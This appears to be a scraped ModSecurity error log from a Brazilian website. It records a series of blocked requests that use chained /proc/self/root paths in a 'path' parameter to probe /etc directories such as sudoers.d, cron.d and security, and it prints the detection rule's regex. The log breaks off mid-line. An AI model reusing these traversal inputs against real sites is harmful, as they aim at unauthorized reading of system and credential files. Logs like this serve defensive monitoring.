https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:22:09.849135 2026] [:error] [pid 11816:tid 140411557287680] [client 74.7.243.128:56858] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqY8ew_le52K8_3pV3Q3gAAAhY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:22:11.222129 2026] [:error] [pid 26799:tid 140411683178240] [client 74.7.243.128:56872] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqY89a6ubjKNq_cu4aKeAAAA0c"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:22:13.428460 2026] [:error] [pid 19507:tid 140411590858496] [client 74.7.241.31:42428] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqY9dY0UrI5A3LftIyVRQAAAZI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:22:19.063859 2026] [:error] [pid 26799:tid 140411616036608] [client 74.7.243.128:56886] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqY-9a6ubjKNq_cu4aKiQAAA08"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:22:20.352503 2026] [:error] [pid 30077:tid 140411548894976] [client 74.7.243.128:35224] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqY_Pu8EFLIOrSqIpv2bQAAAlc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:22:21.702928 2026] [:error] [pid 17887:tid 140411616036608] [client 74.7.243.128:35238] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqY_QkwaGbbGflqUZAB4QAAAM8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:22:23.338064 2026] [:error] [pid 31803:tid 140411658000128] [client 74.7.243.128:35248] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqY_-yqAr6etmhZHNqwdQAAAEo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:22:24.649915 2026] [:error] [pid 19507:tid 140411574073088] [client 74.7.243.128:35260] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqZANY0UrI5A3LftIyVWAAAAZQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:22:35.718435 2026] [:error] [pid 30077:tid 140411674785536] [client 74.7.243.128:35266] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqZC_u8EFLIOrSqIpv2ewAAAkg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:22:38.022180 2026] [:error] [pid 26799:tid 140411708356352] [client 74.7.243.128:45868] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqZDta6ubjKNq_cu4aKkwAAA0Q"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:22:40.001227 2026] [:error] [pid 31803:tid 140411699963648] [client 74.7.243.128:45874] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqZD-yqAr6etmhZHNqwgAAAAEU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:22:43.690696 2026] [:error] [pid 29882:tid 140411674785536] [client 74.7.243.128:42852] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqZE0zinOy1jxa1j4cF8wAAAQg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:22:45.298300 2026] [:error] [pid 19507:tid 140411683178240] [client 74.7.243.128:42856] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqZFdY0UrI5A3LftIyVcAAAAYc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:22:46.626916 2026] [:error] [pid 15826:tid 140411708356352] [client 74.7.243.128:42872] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqZFuoXxyEfFpUF8f9f0QAAAUQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:22:48.286773 2026] [:error] [pid 31803:tid 140411616036608] [client 74.7.243.128:42874] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqZF-yqAr6etmhZHNqwiwAAAE8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:22:50.178345 2026] [:error] [pid 30077:tid 140411666392832] [client 74.7.243.128:45718] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqZGvu8EFLIOrSqIpv2fwAAAkk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:22:51.523172 2026] [:error] [pid 15051:tid 140411741927168] [client 74.7.243.128:45722] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqZGymAPhZkrhU8w4leuQAAAIA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:22:52.807270 2026] [:error] [pid 17887:tid 140411699963648] [client 74.7.243.128:45734] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqZHAkwaGbbGflqUZAB6AAAAMU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:22:57.635478 2026] [:error] [pid 15826:tid 140411658000128] [client 74.7.243.128:45746] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqZIeoXxyEfFpUF8f9f1wAAAUo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:22:59.969675 2026] [:error] [pid 30077:tid 140411691570944] [client 74.7.243.128:45758] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqZI_u8EFLIOrSqIpv2gAAAAkY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:23:01.588231 2026] [:error] [pid 15051:tid 140411565680384] [client 74.7.243.128:42594] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqZJSmAPhZkrhU8w4lewgAAAJU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:23:03.011723 2026] [:error] [pid 29882:tid 140411582465792] [client 74.7.243.128:42604] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag 